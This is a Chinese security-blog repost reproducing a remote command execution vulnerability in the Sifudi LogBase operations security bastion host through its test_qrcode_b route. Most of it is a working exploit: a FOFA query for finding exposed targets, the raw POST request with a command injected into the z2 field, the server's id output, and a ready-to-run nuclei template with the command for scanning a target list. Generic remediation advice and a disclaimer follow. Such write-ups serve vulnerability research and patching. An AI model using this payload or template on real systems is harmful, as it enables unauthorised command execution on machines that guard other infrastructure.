[漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)

admin
admin
admin
138876
文章
114
评论
2023年12月14日08:31:45评论113 views字数 1792阅读5分58秒阅读模式


使



01

漏洞名称



思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞


02


漏洞影响


思福迪-LOGBASE

[漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)


03


漏洞描述


思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞,可以导致服务器被攻击者远控。


04


FOFA搜索语句
app="思福迪-LOGBASE"

[漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)


05


漏洞复现


向靶场发送如下数据包,在靶场上执行id命令

POST /bhost/test_qrcode_b HTTP/1.1Host: BaseURLUser-Agent: Go-http-client/1.1Content-Length: 23Accept-Encoding: gzipConnection: closeContent-Type: application/x-www-form-urlencodedReferer: BaseURL
z1=1&z2="|id;"&z3=bhost


响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 48Content-Type: text/html; charset=utf-8Date: Wed, 13 Dec 2023 10:41:57 GMTServer: npavedStrict-Transport-Security: max-age=31536000; includeSubDomains
uid=93(apache) gid=100(users) groups=100(users)

证明存在漏洞



06


nuclei poc


poc文件内容如下,在本地创建id同名的yaml文件即可使用

id: SAFETY-test_qrcode_b-rce
info:  name: 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞  author: fgz  severity: critical  description: '思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞,可以导致服务器被攻击者远控。'  tags: 2023,SAFETY,LogBase,思福迪,rce  metadata:    max-request: 3    fofa-query: app="思福迪-LOGBASE"    verified: true
http:  - method: POST    path:      - "{{BaseURL}}/bhost/test_qrcode_b"    headers:      Content-Type: application/x-www-form-urlencoded      Connection: close      Referer: "{{BaseURL}}"      Accept-Encoding: gzip    body: 'z1=1&z2="|id;"&z3=bhost'    unsafe: true    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'uid')"

运行POC

nuclei.exe -t SAFETY-test_qrcode_b-rce.yaml -l data/思福迪.txt

[漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)



07


修复建议


以下是一些关于RCE漏洞的修复建议:

  1. 更新和修补:

    • 确保应用程序和操作系统是最新版本,包括所有的安全更新和补丁。

    • 及时应用供应商提供的安全更新,特别是涉及到可能导致RCE漏洞的软件组件。

  2. 输入验证和过滤:

    • 对所有用户输入进行验证和过滤,确保只允许合法的数据进入系统。

    • 使用白名单机制,仅接受符合预期格式和内容的输入。

  3. 最小化权限:

    • 限制应用程序和服务的运行权限,确保它们只能执行必要的操作。

    • 避免使用过高的权限级别,尽可能使用最小化的权限进行运行。

  4. 安全编程实践:

    • 采用安全编程实践,避免使用不安全的函数和方法。

    • 避免直接拼接用户输入到系统命令或查询中,而是使用参数化查询或绑定。

  5. 沙盒环境:

    • 在可能的情况下,将应用程序部署在沙盒环境中,以隔离应用程序的执行环境,减少潜在攻击的影响范围。

原文始发于微信公众号(AI与网安):[漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月14日08:31:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] 思福迪运维安全管理系统 test_qrcode_b RCE漏洞(附POC)https://cn-sec.com/archives/2297150.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息